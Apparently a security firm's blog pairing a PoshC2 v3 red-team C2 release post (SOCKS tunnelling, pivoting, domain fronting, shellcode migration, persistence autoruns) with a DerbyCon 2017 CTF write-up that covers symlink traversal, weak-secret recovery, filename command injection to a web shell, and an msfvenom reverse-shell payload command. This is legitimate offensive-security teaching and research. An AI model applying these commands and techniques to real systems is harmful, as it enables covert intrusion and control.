PoshC2 v3 with SOCKS Proxy (SharpSocks)


We’ve been working on quite a few changes since the release of PoshC2 v2, our public Command & Control framework, back in December 2016. In this blog we’ll talk about the top changes and feature improvements. If you want to view all the changes, we’ve now added a CHANGELOG.md to the repository.

Some headline features are:

  • C# reverse HTTPS tunnelling SOCKS proxy (SharpSocks)
  • Daisy implant now supports multi layered pivoting (no limit on hops)
  • Domain fronting for C2 comms
  • C++ reflective DLL, utilising UnmanagedPowershell and PoshC2’s Custom EXE
  • Shellcode generator, utilising @monoxgas's new sRDI tool we can generate shellcode on the fly from the Reflective DLL created in C++
  • Stable migration utilising Inject-Shellcode which uses our newly created shellcode
  • New AutoRuns that allow the user to create commands that run when a new implant is initiated
  • Pre/Post Implant Help – The Implant-Handler window now has a pre and post help menu which allows you to do various tasks when you have no implant, such as autoruns
  • A new port scanner module



One of the most important tools for a red teamer is the SOCKS proxy. This enables the creation of a tunnel between two machines such that any network traffic forwarded through it appears to have originated from the machine at the far end. Once a foothold has been gained on a machine, a SOCKS proxy can be deployed between the operator's machine and the target in order to access subnets, machines and services that would not normally be directly accessible. This includes being able to RDP to another machine or even to browse the corporate intranet.

SOCKS support is built into most modern browsers and cURL. However, to use tools like rdesktop or nmap, proxychains on Linux can be used to tunnel the traffic. In order to simulate ProxyChains when using Windows, software such as ProxyCap (http://www.proxycap.com/) can be used.
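For reference, pointing proxychains at a SOCKS listener is a single entry at the end of its configuration file. The port shown here is an arbitrary example, not a SharpSocks default; use whatever SOCKS listener port the server was started with:

```
# Tail of /etc/proxychains.conf (port is an arbitrary example)
[ProxyList]
socks4 127.0.0.1 43334
```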

Previously, if tools like PoshC2 or Empire were used to gain a foothold and SOCKS was required, then another implant, such as Meterpreter, would have to be deployed in order to provide the ability to tunnel TCP traffic into the internal network. We decided that deploying a full implant just for SOCKS support is overkill, and while Meterpreter, for example, is very good, it can also be noisy and is not an appropriate representation of most sophisticated threat actors' TTPs. Since PoshC2 is our publicly available C2, we wanted to add this ability for the wider world too, just as we have in our internal tooling.

When started, the implant will connect back via an HTTP request to the specified host. This is known as the command channel. By default, the server will be contacted every 5 seconds (this timing can be changed via the --beacon flag on the implant) to check if there are any connections that need to be opened or closed on the implant side. Once the command channel has successfully connected for the first time, the SOCKS listener port is opened on the server; this port is what proxychains or ProxyCap should be configured to connect to.

Once this has started you can then start your web browser or RDP client etc. and connect to the internal network. Every time the browser or other client opens a connection to the SOCKS port, a job is queued for the command channel; the implant, on the default 5 second timer, will connect and check whether there are any new connections that need to be made or closed. If one needs to be opened, it is assigned its own session identifier, and traffic then flows, tunnelled over HTTP/S in separate requests.
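The timing model can be sketched in a few lines. This is a toy Python model of the open/close job flow, purely illustrative and not SharpSocks' actual protocol:

```python
import queue

# Toy model of the command channel: the "server" queues open/close jobs as
# clients hit the SOCKS port, and the "implant" drains the queue once per
# beacon interval.
jobs = queue.Queue()
sessions = {}

def implant_poll_once():
    """One beacon: service any queued connection jobs."""
    while True:
        try:
            op, session_id = jobs.get_nowait()
        except queue.Empty:
            return
        if op == "open":
            sessions[session_id] = "tunnelling"   # traffic now flows over HTTP/S
        elif op == "close":
            sessions.pop(session_id, None)

# A browser connection queues an "open" job, serviced on the next beacon.
jobs.put(("open", "sess-1"))
implant_poll_once()
```

The key point the model captures is that nothing happens between beacons: a new connection waits in the queue until the implant next checks in, which is why shortening the beacon time matters for interactive protocols like RDP.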

A typical usage scenario is shown in the diagram above. A foothold has been gained on a machine with internet access, but only via HTTP/S, and RDP needs to be used to access the RDP Host (credentials for this box have, of course, been obtained). The SharpSocks server is started and so is the implant. Proxychains is then configured by the operator to point to the SOCKS port. Rdesktop is then started and traffic is tunnelled via HTTPS to the implant host, where the connection is then made to the RDP host.

Design Goals

The project originated as a way to provide SOCKS proxy functionality to Nettitude’s PoshC2 project.  The design goals were as follows:

  • Ability to operate as part of another implant or its own separate instance
  • Communication over HTTP/S
  • Minimal CPU/memory load on implanted machine
  • Encrypted transport
  • Configurable locations within a HTTP request for the payload
  • Proxy aware
  • IPv6 support
  • Ease of integration into other projects
  • Ease of overriding functionality, such as encryption or the transport method, by a consumer


The best usage experience for this currently is via PoshC2.

SharpSocks, written by Rob Maslen (@rbmaslen), utilises a C# AssemblyLoad to run a SOCKS4a proxy on the implant, calling back to a server which can be located either on the same PoshC2 instance or on a different host. The most convenient way to deploy it is via the same PoshC2 host, but on a separate port. The comms can be split via Apache rewrite rules if you're using a C2 proxy on the Internet. It may also be a good idea to use a separate host for this traffic, as you may have to speed comms up to 1 or 2 second beacons; a separate proxy host can be used for that, with everything still pointing back to the same PoshC2 instance at the back end.

The comms URLs for both PoshC2 and SharpSocks can now be fully customised when first setting the server up. These can then be added to an apache.conf file located in the root of the PoshC2 folder.

A sample set of Apache rules is shown below:
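Something along these lines; the URIs, the SharpSocks port and the back end address here are illustrative assumptions, not the rules shipped with PoshC2:

```
RewriteEngine On
# Implant comms are forwarded to the PoshC2 C2 server
RewriteRule ^/news/(.*) https://10.0.0.5:443/news/$1 [P]
# SharpSocks comms are forwarded to the SharpSocks listener on a separate port
RewriteRule ^/images/(.*) http://10.0.0.5:49031/images/$1 [P]
```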

To deploy SharpSocks all you need to do is run the following command from within a live implant. This will create a new encryption key and subsequent channel and start both the implant and SharpSocks server for you:

SharpSocks -Uri https://www.c2.com:443 -Beacon 2000 -Insecure

Here is a simple video that shows this being used:

This can be used as a standalone program outside of PoshC2 too. The code and PowerShell script can be found below:

The next few sections walk you through using SharpSocks in a standalone manner.

There are two Visual Studio solutions, which build the server and the implant respectively. Both are built as DLLs; however, the solutions also contain projects for executables that wrap the DLLs and allow the functionality to be tested. These EXEs are not designed to be deployed in a production scenario.

The DLLs are designed to be launched either via the test executables or via the helper functions within the DLLs themselves, enabling usage from other projects and languages. Also included within the binaries directory is the PowerShell script that is used by PoshC2.

Server App (SharpSocksServerTestApp)

Running the server binary with the --help flag lists the following options. In order to launch, the only required value is the encryption key. This should be supplied in Base64; the default algorithm is AES-256.

An example of this running would be the following

This will start the HTTPS server (HTTPS requires that a certificate is installed via netsh) listening on https://c2proxy.on.the.internet. The communications are encrypted via the key NqeEk7h4pe7cJ6YGB/4q3jHZ5kp64xsghwNwjYUFD0g=, the command channel is identified by bc448036-f957-45d9-b0e7-997b4121034f. The session identifier would be transmitted via the ASP.NET_SessionId cookie and smaller payloads via the __RequestVerificationToken cookie.

Server DLL (SharpSocksServerDLL)

Within SharpSocksServer.dll is a class called SharpSocksServer.Source.Integration.PSSocksServer which contains a single method called CreateSocksController. This method is designed as a static helper to make creating and starting the SharpSocks server easy. In order to use it, the DLL/assembly must first be loaded, the CreateSocksController method called, and then the Start method called on the returned value. For example usage, it's best to look at the PowerShell script included with this project.

Implant Test App (SharpSocksImplantTestApp)

An example:

This will start the implant which will attempt to connect to https://c2proxy.on.the.internet using the system proxy settings. The communications are encrypted via the key NqeEk7h4pe7cJ6YGB/4q3jHZ5kp64xsghwNwjYUFD0g=, the command channel is identified by bc448036-f957-45d9-b0e7-997b4121034f. The session identifier would be transmitted via the ASP.NET_SessionId cookie and smaller payloads via the __RequestVerificationToken cookie. The command channel will attempt to connect every 7.5 seconds to the SharpSocks server.

Implant DLL (SharpSocksImplant.dll)

Within SharpSocksImplant.dll is a class called SocksProxy.Classes.Integration.PoshCreateProxy which contains a single method called CreateSocksController. This method is designed as a static helper to make creating and starting the implant easy. In order to use it, the DLL/assembly must first be loaded, the CreateSocksController method called, and then the Start method called on the returned value. As with the SharpSocks server, for example usage it's best to look at the PowerShell script included with this project.


To enable multi-layered pivoting in PoshC2 we have created a module called Invoke-DaisyChain. This must be run as an administrator on a compromised host within the compromised network. It essentially creates an HTTP proxy server running on that host to transport PoshC2 comms traffic from the internal network out to the PoshC2 instance, instead of each implant going direct with CreateProxyPayload.

To start the DaisyChain server, simply run this command with your C2 configuration. Proxy settings are optional as is the domain fronting URL:

Invoke-DaisyChain -name jason -daisyserver -port 9999 -c2port 443 -c2server https://www.c2domain.com -domfront aaa.cloudfront.net -proxyurl -proxyuser dom\test -proxypassword pass

This will create a variety of payloads that are specific to this pivot server. If you run the new payloads (named 'jason' in this instance), they will attempt to connect to the proxy port running on this host rather than going direct to the Internet. To execute these payloads remotely, you can use any of the lateral movement methods built into PoshC2, or any of your own.

There is no limit on the number of times you can pivot into a network. However, if any of the machines in the chain get restarted for any reason, the entire chain will die. This is worth noting when performing pivoting within a network using Daisy Chaining.


PoshC2 can now use domain fronting for comms. There is a caveat: the host must have .NET v4.0.30319 installed and usable by the PowerShell instance. If the host does not have this version of the CLR installed, it will fall back to the underlying CDN hostname, for example cloudfront.net or azureedge.net. The way we perform domain fronting in PoshC2 is by adding the Host header to the web requests.
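The Host-header trick can be sketched as follows. The TLS connection (and SNI) target the high-reputation CDN edge, while the HTTP Host header names the CloudFront distribution that fronts the C2; the hostnames here reuse the examples from this post and are illustrative:

```python
import urllib.request

# Build a request to the CDN edge, but override the Host header so the CDN
# routes it to the fronted distribution rather than the edge's own content.
req = urllib.request.Request("https://d0.awsstatic.com/")
req.add_header("Host", "aaa.cloudfront.net")
# Calling urllib.request.urlopen(req) would send the request to
# d0.awsstatic.com over TLS, with the Host header steering it to the
# fronted distribution behind the CDN.
```

Network observers see only a connection to the CDN hostname; the fronted destination is visible solely inside the encrypted HTTP request.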

This is a much stealthier option for comms as you can utilise hostnames with better reputation without needing to buy new domains and obtain reputation yourself. There are many examples of these on the Internet, but as a proof of concept this example uses ‘d0.awsstatic.com’.


The new pre-implant help menu allows you to configure various auto-runs, double check the server configuration and make any significant changes to the C2 server. It also allows you to test your configuration by issuing PwnSelf to obtain an implant.

Other settings that can be altered include the C2 default beacon time, and the Clockwork SMS API key and mobile number for text message alerts of new implants.


We have now implemented the concept of Auto-Runs. This allows the user of PoshC2 to automate various tasks when an implant first comes in. A few use cases of this could be:

  • auto-migrating from PowerShell
  • capturing a screenshot for situational awareness
  • installing persistence

Essentially, any command that can be issued within PoshC2 can be turned into an Auto-Run.

This menu can be found on the pre-implant help menu. An example of this menu has been shown below:


The auto migrate from PowerShell feature has been added; by default it will start another process, netsh.exe, unless otherwise specified with the '-newprocess' parameter. This utilises unmanaged PowerShell via the C++ reflective DLL.


The C++ reflective DLL utilises the concept from the unmanaged PowerShell code by @tifkin_.

We have created a .NET binary that is loaded by creating an instance of the CLR (v2.0.50727 or v4.0.30319) at runtime, patching the implant over the top when creating a new payload. This is done by declaring a placeholder variable in the C++ code, a buffer of 5000 'A's, and overwriting that region. Once compiled, we find the location of this buffer and pass its offset to the PatchDLL function as shown below.
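The placeholder-patching idea can be sketched in a few lines of Python. The function name, padding behaviour and error handling here are assumptions for illustration, not PoshC2's actual C++ code:

```python
def patch_dll(dll_bytes: bytes, payload: bytes, marker: bytes = b"A" * 5000) -> bytes:
    """Locate the run of 'A's compiled into the DLL and overwrite it in
    place with the real payload, padding the remainder with null bytes."""
    offset = dll_bytes.find(marker)
    if offset == -1:
        raise ValueError("placeholder not found in DLL")
    if len(payload) > len(marker):
        raise ValueError("payload larger than placeholder")
    padded = payload + b"\x00" * (len(marker) - len(payload))
    return dll_bytes[:offset] + padded + dll_bytes[offset + len(marker):]
```

Because the patched region is exactly the size of the placeholder, the file layout and every other offset in the DLL are left untouched.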

In addition, PoshC2 converts the newly created reflective DLL into Shellcode via @monoxgas’s sRDI PowerShell module. This module converts Reflective DLLs into position independent shellcode.

The reflective DLL and new shellcode have enabled PoshC2 to be more flexible in its execution and deployment. Many other tools will allow a reflective DLL or shellcode to be loaded. Take, for example, the MS17-010 EternalBlue exploit written in PowerShell: it takes shellcode as a parameter to execute if the host is successfully exploited, and having shellcode as a payload format makes this possible.

Also, for migration, we now use either the reflective DLL or the shellcode to squirt the implant into another process. When first starting PoshC2, it will create both reflective DLLs, as shown below:

  • Posh_x64.dll
  • Posh_x86.dll

To test these out, they can be called via rundll32. PoshC2 also converts each DLL into position independent shellcode:

  • Posh-shellcode_x64.bin
  • Posh-shellcode_x86.bin

To test these out, they can be called via the new Inject-Shellcode script or by using ‘migrate’ in the implant window:


@rbmaslen has created a super fast port scanner written in C#, which has been ported to PoshC2 using AssemblyLoad rather than Add-Type. This is not done to obfuscate the code at all; rather, in case you're not aware, PowerShell's Add-Type cmdlet actually compiles the code on the fly and touches disk in the interim. This is why both the SharpSocks and port scanner modules have been written to use AssemblyLoad instead.

The port scanner can take various parameters, but we particularly like the fact that you can go into 'super fast' mode, setting the maximum queries per second (-maxQueriesPS). This is similar to masscan's rate parameter, and is useful when your intention is not to be stealthy and you want to perform quick port scanning against a target. An example is shown below.

On the other hand, when performing red teaming the aim is usually to be stealthy, so we have implemented an option for delaying the port scan. For example, if you set the max queries per second (-maxQueriesPS) to 1 and the delay (-Delay) to 10, it will attempt to connect to each port with a 10 second delay, hopefully evading any host or network IDS detection. An example of this is shown below.
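The two profiles boil down to a rate cap and a per-probe delay. A minimal Python sketch of the idea (illustrative only; this is not the C# PortScanner module shipped with PoshC2):

```python
import socket
import time

def connect_scan(host, ports, max_qps=10, delay=0.0):
    """Minimal TCP connect scan with a crude rate limit."""
    open_ports = []
    interval = 1.0 / max_qps if max_qps else 0.0
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1.0)
        try:
            if s.connect_ex((host, port)) == 0:   # 0 means the connect succeeded
                open_ports.append(port)
        finally:
            s.close()
        # Honour whichever is slower: the rate cap or the explicit delay.
        time.sleep(max(interval, delay))
    return open_ports
```

With max_qps=1 and delay=10 this mirrors the slow profile described above, while raising max_qps approximates the 'super fast' mode.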


Go and download the latest version of PoshC2 with SharpSocks and let us know what you think!

DerbyCon 2017 CTF Write Up

The excellent Derbycon 2017 has just come to an end and, just like last year, we competed in the Capture The Flag competition, which ran for 48 hours from noon Friday to Sunday. As always, our team name was SpicyWeasel. We are pleased to say that we finished in first place, which netted us a black badge.

We thought that, just like last year, we'd write up a few of the challenges we faced for those who are interested. A big thank you to the DerbyCon organizers, who clearly put a lot of effort into delivering a top quality and most welcoming conference.



Navigating to this box, we found a new social media application that calls itself “The premiere social media network, for tinfoil hat wearing types”. We saw that it was possible to create an account and log in. Further, on the left hand side of the page it was possible to view profiles for those who had already created an account.

Once we had created an account and logged in, we were redirected to the page shown below. Interestingly, it allowed you to upload tar.gz files, and tar files have some interesting properties… By playing around with the site, we confirmed that uploaded tar files were indeed untarred and their contents written out to the /users/ path.

One of the more interesting properties of tar is that, by default, it doesn't follow symlinks; rather, it adds the symlink itself to the archive. In order to archive the target file and not the symlink, you can use the -h or --dereference flag, as shown below.

Symlinks can point to both files and directories, so to test if the page was vulnerable we created the following archive pointing to:

  • the /root dir
  • /etc
  • the known_hosts file in /root/.ssh (on the off chance…)
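An archive of this shape can be reproduced with Python's tarfile module. The paths and archive name here are illustrative:

```python
import os
import tarfile
import tempfile

# Build an archive whose member is a symlink pointing outside the extraction
# root. Extracted server-side, requests beneath the link escape the web root.
workdir = tempfile.mkdtemp()
link = os.path.join(workdir, "etc")
os.symlink("/etc", link)                      # the symlink itself is archived
archive = os.path.join(workdir, "zzz.tar.gz")
with tarfile.open(archive, "w:gz") as tar:
    # recursive=False stores the link entry, not the directory it points at
    tar.add(link, arcname="zzz/etc", recursive=False)
```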

The upload was successful and the tar was extracted.

Now to find out if anything was actually accessible. By navigating to /users/zzz/root/etc/passwd we were able to view the passwd file.

Awesome – we had access. We stuck the hash for rcvryusr straight into hashcat and it wasn’t long before the password of backup was returned and we were able to login to the box via SSH.

We then spent a large amount of time attempting privilege escalation on this Slackware 14.2 host. The organisers let us know, after the CTF had finished, that there was no privilege escalation. We thought that we would share this with you, so that you can put your mind at rest if you did the same!


Before we proceed with this portion of the write up, we wanted to note that this challenge was a 0day discovered by Rob Simon (@_Kc57) – props to him! After the CTF finished, we confirmed that there had been attempted coordinated disclosure in the preceding months. The vendor had been contacted and failed to provide a patch after a reasonable period had elapsed. Rob has now disclosed the vulnerability publicly and this sequence of events matches Nettitude’s disclosure policy. With that said…

We hadn’t really looked too much at this box until the tweet below came out. A good tip for the DerbyCon CTF (and others) is to make sure that you have alerts on for the appropriate Twitter account or whatever other form of communication the organizers may decide to use.

Awesome – we have a 0day to go after. Upon browsing to the .299 website, we were redirected to the /KB page. We had useful information in terms of vendor and a version number, as highlighted below.

One of the first things to try after obtaining a vendor and version number is to attempt to locate the source code, along with any release notes. As this was a 0day there wouldn’t be any release notes pointing to this issue. The source code wasn’t available, however it was possible to download a trial version.

We downloaded the zip file and extracted it. Happy days: we found it was a .NET application. Anything .NET we find immediately has a date with a decompiler. The one we used for this was dotPeek from https://JetBrains.com. There are a number of different decompilers for .NET (dnSpy being a favourite of a lot of people we know) and we recommend you experiment with them all to find one that suits you.

By loading the main HelpDesk.dll into dotPeek, we were able to extract all the source from the DLL by right clicking and hitting Export to Project. This drops all the source code that can be extracted into a folder of your choosing.

Once the source was exported, we quickly ran it through Visual Code Grepper (https://github.com/nccgroup/VCG) which:

“has a few features that should hopefully make it useful to anyone conducting code security reviews, particularly where time is at a premium“

Time was definitely at a premium here, so in the source code went.

A few issues were reported, but upon examining them further, they were all found to be false positives. The LoadXml finding was particularly interesting, as although XmlDocument is vulnerable to XXE injection in all but the most recent versions of .NET, the vendor had correctly nulled the XmlResolver, mitigating the attack.

A further in depth review of the source found no real leads.

The next step was to look through all the other files that came with the application. Yes we agree that the first file we should have read was the readme but it had been a late night!

Anyway, the readme. There were some very interesting entries within the table of contents. Let’s have a further look at the AutoLogin feature.

The text implies that by creating an MD5 hash of the username + email + shared secret, it may be possible to log in as that user. That's cool, but what is the shared secret?

Then, the tweet below landed. Interesting.

We tried signing up for an account by submitting an issue, but nothing arrived. Then, later on another tweet arrived. Maybe there was something going on here.

So, by creating an account and then triggering a Forgotten Password for that account, we received this email.

Interesting – this is the Autologin feature. We really needed to look into how that hash was created.

At this point we began looking into how the URL was generated and located the function GetAutoLoginUrl(), which was within the HelpDesk.BusinessLayer.VariousUtils class. The source of this is shown below.

As stated in the readme, this is how the AutoLogin hash was generated: by appending the username, the email address and, in this case, the month and day. The key here was really going to be that SharedSecret. We were really starting to wonder at this point, since the only way to obtain that hash was via email.

The next step was to try and understand how everything worked. At this point we started Rubber Ducky Debugging (https://en.wikipedia.org/wiki/Rubber_duck_debugging). We also installed the software locally.

Looking in our local version, we noticed that you can't change the shared secret in the trial. Was it the same between installations?

One of the previous tweets started to make sense too.

The KB article leaked the username and email address of the admin user. Interesting, although it was possible to obtain the email address from the sender and, well, the username was admin…

We tried to build an AutoLoginUrl using the shared secret from our local server with no joy. Okay. Time to properly look at how that secret was generated.

Digging around, we eventually found that the AutoLoginSharedSecret was initialised using the following code.

This was looking promising. While the shared secret this code generated was long enough, the code made some critical errors that left the secret recoverable.

The first mistake was to drastically narrow the key space; uppercase A-Z and 2-9 is not good enough.

The second mistake was with the use of the Random class:

This is not random in the way the vendor wanted it to be. As the documentation states below, providing the same seed will produce the same sequence. The seed is a 32-bit signed integer, meaning that there will only ever be 2,147,483,647 possible sequences.
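The determinism is easy to demonstrate. Python's PRNG differs from .NET's System.Random, but the property being exploited is identical:

```python
import random

# The same 32-bit seed always yields the same draw sequence, so a secret
# generated this way has at most 2,147,483,647 possibilities no matter how
# long the secret itself is.
first = random.Random(1337)
second = random.Random(1337)
seq_one = [first.randrange(34) for _ in range(20)]   # 34 = size of A-Z + 2-9
seq_two = [second.randrange(34) for _ in range(20)]
```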

In order to recover the key, the following C# was written in (you guessed it!) LinqPad (https://www.linqpad.net/).

The code starts with a counter of 0 and then seeds the Random class with it, generating every possible secret. Each of these secrets is then hashed with the username, email, day and month to see if it matches the hash recovered from the forgotten password email.
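The same recovery loop can be sketched in Python. Everything here is illustrative: the secret generator is a stand-in for the target's Random-based code (not byte-compatible with .NET), and the concatenation order inside the hash is an assumption:

```python
import hashlib
import random
import string

# The narrowed charset the vendor used: uppercase A-Z plus 2-9 (34 characters).
CHARSET = string.ascii_uppercase + "23456789"

def secret_from_seed(seed, length=20):
    # Seeded PRNG drawing from the small charset; stands in for the vendor's
    # System.Random-based generator.
    rng = random.Random(seed)
    return "".join(rng.choice(CHARSET) for _ in range(length))

def autologin_hash(username, email, secret, day, month):
    # Concatenation order is an assumption for illustration.
    data = f"{username}{email}{secret}{day}{month}".encode()
    return hashlib.md5(data).hexdigest()

def recover_secret(target_hash, username, email, day, month, max_seed=2**31 - 1):
    # Walk the seed space, regenerating each candidate secret and comparing
    # its hash against the one recovered from the forgotten password email.
    for seed in range(max_seed):
        candidate = secret_from_seed(seed)
        if autologin_hash(username, email, candidate, day, month) == target_hash:
            return candidate
    return None
```

With only a 31-bit seed space and a cheap per-candidate check, an exhaustive search is entirely practical on commodity hardware.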

Once the code was completed it was run and – boom – the secret was recovered. We should add that there was only about 20 mins to go in the CTF at this stage. You could say there was a mild tension in the air.

This was then used to generate a hash and autologin link for the admin user. We were in!

The flag was found within the assets section. We submitted the flag and the 8000 points were ours (along with another challenge coin and solidified first place).

We could finally chill for the last 5 mins and the CTF was ours. A bourbon ale may have been drunk afterwards!


While browsing the web root directory (directory listings were enabled) on the web server, we came across a file called jacked.html. When rendered in the browser, the page references an image called turtles.png, but it didn't show when viewing the page. There was a bit of a clue in the page's title, “I Like Turtles”… we guess somebody loves shells!

When viewing the client side source of the page, we saw that there was a data-uri for the turtle.png image tag, but it looked suspiciously short.

Using our favourite Swiss army tool of choice, LinqPad (https://www.linqpad.net/ – we promise we don’t work for them!), to Base64 decode the data-uri string, we saw that this was clearly an escape sequence. Decoding further into ASCII, we had a big clue – that looks a lot like shellcode in there.

The escape sequence definitely had the look of x86 about it, so back to LinqPad we went in order to run it. We have a basic shellcode runner for occasions like this. Essentially, it opens notepad (or any other application of your choosing) as a process and then allocates memory in that process. The shellcode is written into that allocation and a thread is then kicked off, pointing at the top of the shellcode. The script is written with a break in it so that, after notepad is launched, you have time to attach a debugger. The last two bytes are CD 80, which translates to int 80 (the system call handler interrupt in Linux, and a far superior rapper than Busta).

Attaching to the process with WinDbg and hitting go in LinqPad, the int 80 was triggered, which fired an Access Violation within WinDbg. This exception was then caught, allowing us to examine memory.

Once running WinDbg we immediately spotted a problem: int 80h is the Linux system call handler, so this shellcode was obviously designed to be run under a different OS. Oops. Oh well, let's see what we could salvage.

One important point to note is that when making a system call in Linux, values are passed from user land to the kernel via registers. EAX contains the system call number, then EBX, ECX, EDX, ESI and EDI take the parameters to the call, in that order. The shellcode translates as follows. XORing a register with itself is used as a quick way to zero out a register.

What we saw here was that the immediate value 4 is moved into the first byte of the EAX register (known as AL). This translates to the system call sys_write, which effectively has the following prototype.

Based upon the order of registers above, this prototype and the assembly, we see that EBX contains a value of 1, which is stdout; ECX contains the stack pointer, which is where the flag is located; and EDX has a value of 12h (18 decimal), which corresponds to the length of the string.

So yes, had this been run on a Linux OS we would have had the flag nicely written to the console rather than an access violation, but all was not lost. We knew the stack contained the flag, so all we needed to do was examine what was stored at the ESP register (the stack pointer). In WinDbg you can dump memory in different formats using d followed by a second letter indicating the format. For example, in the screenshot below the first command is dd esp, which dumps memory in DWORD or 4 byte format (by default 32 of them, returning 128 bytes of memory). The second command shown is da esp, which dumps memory in ASCII format until it hits a null character or has read 48 bytes.


When browsing to the web server, we found the iLibrarian application hosted within a directory of the same name. The first two notable points about this site were that we had a list of usernames in a drop down menu (very curious functionality) and, at the bottom of the page, a version number. There was also the ability to create a user account.

When testing an off the shelf application the first few steps we perform are to attempt to locate default credentials, the version number and then obtain the source/binaries if possible. The goal here is an attempt to make the test as white box as possible.

A good source of information about recent changes to a project is the issues tab on GitHub. Sometimes, security issues will be listed. As shown below, on the iLibrarian GitHub site one of the first issues listed was “RTF Scan Broken”. Interesting title; let’s dig a little further.

There was a conversion to RTF error, apparently, although very little information was given about the bug.

We looked at the diff of the change. The following line looked interesting.

The next step was to check out the history of changes to the file.

The first change listed was for a mistyped variable bug, which didn’t look like a security issue. The second change looked promising, though.

The escaping of shell arguments is performed to ensure that a user cannot supply data that breaks out of the system command and starts performing the user's own actions against the OS. The usual methods of breaking out include back ticks, line breaks, semi-colons, apostrophes, etc. This type of flaw is well known and is referred to as command injection. In PHP, the language iLibrarian is written in, the mitigation is usually to wrap any user supplied data in a call to escapeshellarg().
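As a toy illustration of the breakout (Python stands in for PHP here; shlex.quote() plays the role of escapeshellarg(), and the filename and command are made up):

```python
import shlex

# An attacker-controlled upload name carrying a payload after the semi-colon.
filename = "paper.doc; id"
# Unsafe: the name is interpolated straight into the shell command line, so
# "id" would run as a second command.
unsafe = "soffice --convert-to rtf %s" % filename
# Safe: quoting collapses the whole value into one literal argument.
safe = "soffice --convert-to rtf %s" % shlex.quote(filename)
```

The quoted form passes the entire string, semi-colon included, as a single argument to the converter, which is exactly what the escapeshellarg() fix achieves in iLibrarian.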

Looking at the diff of changes for the “escape shell arguments” change, we can see that it was to call escapeshellarg() on two parameters that are passed to the exec() function (http://php.net/manual/en/function.exec.php).

Viewing the version before this change, we saw the following key lines.

Firstly, a variable called $temp_file is created. This is set to the current temporary path plus the value of the filename that was passed during the upload of the manuscript file (manuscript is the name of the form variable). The file extension is then obtained from $temp_file and, if it is doc, docx or odt, the file is converted.

The injection was within the conversion shown in the third highlight. By providing a filename that breaks out of the command, we should have command injection.

Cool. Time to try and upload a web shell. The following payload was constructed and uploaded.

This created a page that would execute any value passed in the cmd parameter. It should be noted that during a proper penetration test, when exploiting issues like this, a predictable name such as test4.php should NOT be used, lest it be located and abused by someone else (we typically generate a name from multiple GUIDs) and, ideally, there should be some built-in IP address restrictions. However, this was a CTF and time was of the essence. Let's hope no other teams found our obviously named, newly created page!

The file had been written. Time to call test4.php and see who we were running as.

As expected, we were running as the web user and had limited privileges. Still, this was enough to clean up some flags. We decided to upgrade our access to the operating system by using a fully interactive shell – obtained using the same attack vector.

Finally, we looked for a privilege escalation. The OS was Ubuntu 15.04 and one Dirty Cow later, we had root access and the last flag from the box.


This box had TCP ports 80 and 10000 open. Port 80 ran a web server that hosted a number of downloadable challenges, while port 10000 appeared to be Webmin.

Webmin was an inviting target because its version appeared to be vulnerable to a number of publicly available flaws that would suit our objective. However, none of the exploits appeared to be working. We then removed the blinkers and stepped back.

The web server on port 80 leaked the OS in its server banner; none other than North Korea’s RedStar 3.0. Aha – not so long ago @hackerfantastic performed a load of research on RedStar and if memory served, the results were not good for the OS. Sure enough…

A quick bit of due diligence on the exploit, then we simply set up a netcat listener, ran the exploit with the appropriate parameters and – oh look – an immediate root shell. Flag obtained; fairly low value, and rightfully so. Thanks for the stellar work @hackerfantastic!

Dup Scout

This box ran an application called Dup Scout Enterprise.

It was vulnerable to a remote code execution vulnerability, an exploit for which was easily found on exploit-db.

We discovered that the architecture was 32-bit by logging in with admin:admin and checking the system information page. The only change needed for the exploit to work on the target was to swap the shellcode provided by the out-of-the-box exploit for shellcode suiting a 32-bit OS. This can easily be achieved by using msfvenom:

  • msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=none -e x86/alpha_mixed -f python

Before we ran the exploit against the target server, we set up the software locally to check it would all work as intended. We then ran it against the production server and were granted a shell with SYSTEM level access. Nice and easy.


To keep some reddit netsecers in the cheap seats happy this year: yes, we actually had to open a debugger (and IDA too). We’ll walk you through two of the seven binary challenges presented.

By browsing the web server, we found the following directory containing 7 different binaries. This write up will go through the x86-intermediate one.

By opening it up in IDA and heading straight to the main function, we found the following code graph:

Roughly, this translates as checking if the first parameter passed to the executable is -p. If so, the next argument is stored as the first password. This is then passed to the function CheckPassword1 (not the actual name, this has been renamed in IDA). If this is correct the user is prompted for the second password, which is checked by CheckPassword2. If that second password is correct, then the message “Password 2: good job, you’re done” is displayed to the user. Hopefully, this means collection of the flag too!

By opening the CheckPassword1 function, we immediately saw that an array of chars was being built up. A pointer to the beginning of this array was then passed to _strcmp along with the only argument to this function, which was the password passed as p.

We inspected the values going into the char array and they looked like lower case ASCII characters. Decoding these led to the value the_pass.
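The decoding step is trivial to reproduce in Python (the byte values below are reconstructed from the recovered password rather than copied from the binary):

```python
# The stack-built char array from CheckPassword1, as raw byte values,
# in the order they were written into memory.
stacked_bytes = [0x74, 0x68, 0x65, 0x5F, 0x70, 0x61, 0x73, 0x73]

# Each byte is just an ASCII code; join them to read the password.
decoded = "".join(chr(b) for b in stacked_bytes)
print(decoded)  # the_pass
```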

Passing that value to the binary with the -p flag, we got the following:

Cool, so time for the second password. Jumping straight to the CheckPassword2 function, we found the following at the beginning of the function. Could it be exactly the same as the last function?

Nope, it was completely different, as the main body of the function shown in the following screenshot illustrates. It looks a bit more complicated than the last one…

Using the excellent Compiler Explorer hosted at https://godbolt.org/, it roughly translates into the following:

The method to generate the solution here was to adapt this code into C# (yes; once again in LinqPad, and nowhere near as difficult as it sounds), this time to run through each possible character combination and then check whether the generated value matched the stored hash.
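The search strategy can be sketched in a few lines of Python (the checksum function below is a stand-in, not the routine recovered from CheckPassword2, and the target value is likewise illustrative; only the exhaustive-search structure matches what we actually did):

```python
from itertools import product
import string

def checksum(candidate: str) -> int:
    # Stand-in for the hash recovered from the disassembly; the real
    # function differed, but the exhaustive search works the same way.
    h = 0
    for ch in candidate:
        h = (h * 31 + ord(ch)) & 0xFFFFFFFF
    return h

# Printable characters worth trying, per the recovered password's makeup.
ALPHABET = string.ascii_lowercase + string.digits + "@!)"

# Pretend this value was read out of the binary.
TARGET = checksum("@1a")

def brute_force(length: int):
    """Try every combination of the given length until the hash matches."""
    for combo in product(ALPHABET, repeat=length):
        candidate = "".join(combo)
        if checksum(candidate) == TARGET:
            return candidate
    return None

print(brute_force(3))  # @1a
```

The real search simply used a longer length and the transcribed hash routine in place of the stand-in.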

Running it, we found what we were looking for – @12345!) and confirmed it by passing it into the exe.

